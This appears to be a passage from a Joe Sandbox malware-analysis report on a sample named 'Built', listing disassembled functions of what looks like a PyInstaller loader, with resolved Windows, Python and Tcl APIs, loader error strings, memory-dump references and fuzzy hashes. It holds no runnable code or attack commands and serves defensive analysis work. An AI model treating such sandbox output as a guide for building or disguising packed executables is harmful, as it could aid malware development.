                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5ECC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55DC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF65E2A610C), ref: 00007FF65E2A5EF3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                                        • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                        • Instruction ID: 76b4522d837cf2a77bd86c2dea338a05d10ad2e364f6f8f573d8f5af9e49c08b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E518F32F4864296EF10EF21DB811AA7761BF68784F48853AFA4DE3699DF7CE4418740
                                                                                                                                                                                                                                                        Function 00007FF65E285830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285840
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285852
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285889
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28589B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858B4
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858C6
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858DF
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2858F1
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28590D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28591F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28593B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28594D
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285969
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E28597B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285997
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859A9
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859C5
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E2859D7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction ID: 00ce6a9086011b12359e8dce0fb61d1f409d8feccf078adfd4ecd605851f8420
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A522B564A8DB0B91FE259B65AB2557433A2BF34745F4C103AF45EE226CFFBCA548C240
                                                                                                                                                                                                                                                        Function 00007FF65E2876C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction ID: ba150b72f5c499c2833d4555e45f944e75e40d3bfbc549e1d1c03aff15cd7162
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6902C765A8DB0791FE249B65AB145B533A2AF38749F4C1035F42EF226CEFBCB549C200
                                                                                                                                                                                                                                                        Function 00007FF65E2881D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF65E2886B7,?,?,00000000,00007FF65E283CBB), ref: 00007FF65E28822C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282810: MessageBoxW.USER32 ref: 00007FF65E2828EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                        • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                        • Instruction ID: ab943f22be1ebe06e4c07dfbd0f076644ee23d79b523da63ba1409ef2b65f5ff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20519711A2C78281FF549B25EB516B97391AFB4784F8C5432FA0EE2ADDEE7CE5058700
                                                                                                                                                                                                                                                        Function 00007FF65E282180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction ID: 930066a9d323d8e48abafec30e02c9972efd81a3cf1d0cda4af9c68bd3bb7800
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F45108266087A186DA349F36F5181BAB7A1F7A8B61F044125EFDE83698DF7CD045CB10
                                                                                                                                                                                                                                                        Function 00007FF65E2880C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction ID: 95128e484455597ab081a9991fa3537dcad66f2ef1913802e3c28c96a3f68b16
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61219C21B4CB8282EF558B7AAB541797251EFA8B90F9C4230EA2DD37DCDE6CD5908200
                                                                                                                                                                                                                                                        Function 00007FF65E296290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction ID: abcb7667b957d8f5dbd0e8adad4feb9a5406bc79a4c0f8f9e0a23a0e5bdf5d00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56127E61E0824386FF245A14D3542B976E2FB60B50F8CA135F68AE6ACCDF3CE5C49B05
                                                                                                                                                                                                                                                        Function 00007FF65E290FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction ID: c92431c3f2b19ad514a78245bf6684d9d29dc8cb35ffddbace7df5535a84bb15
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37125F61E0C34386FF245A17A3442B976A1FB60790F9E6035F69AD6AC8DF7CE5C08B14
                                                                                                                                                                                                                                                        Function 00007FF65E281050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 85c2c2a02d59a3f01d6fca0121019b429f379df926c48f268a81054661b59493
                                                                                                                                                                                                                                                        • Instruction ID: 0ea52cefb6d6ca7259a5c6bf1b5efbc983756a13d7a7122bb8d57dd8fbef602c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c2c2a02d59a3f01d6fca0121019b429f379df926c48f268a81054661b59493
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8413522A0C75286EE10DB12AB406BA7391BF64B84F9C4432FD4CE77DADE3CE9458740
                                                                                                                                                                                                                                                        Function 00007FF65E281470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 73de28b9ba9fe8a8e367a1b61ff615074c78b555d98f5270f885359bfc6ce07d
                                                                                                                                                                                                                                                        • Instruction ID: 6ba09c0d8d2edfa4c93e677ee70fcea47ebae8575d2bbd90d0fdeff36de69caf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73de28b9ba9fe8a8e367a1b61ff615074c78b555d98f5270f885359bfc6ce07d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B416722A0C74286EE10DB22A7405B97391BF64794F884932FD4DE7A9DDE7CE546CB04
                                                                                                                                                                                                                                                        Function 00007FF65E28EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction ID: aa4659e3f42c6b7a15304c7e68fe7735d7625bd46b8b15cebfe575c27e0770f4
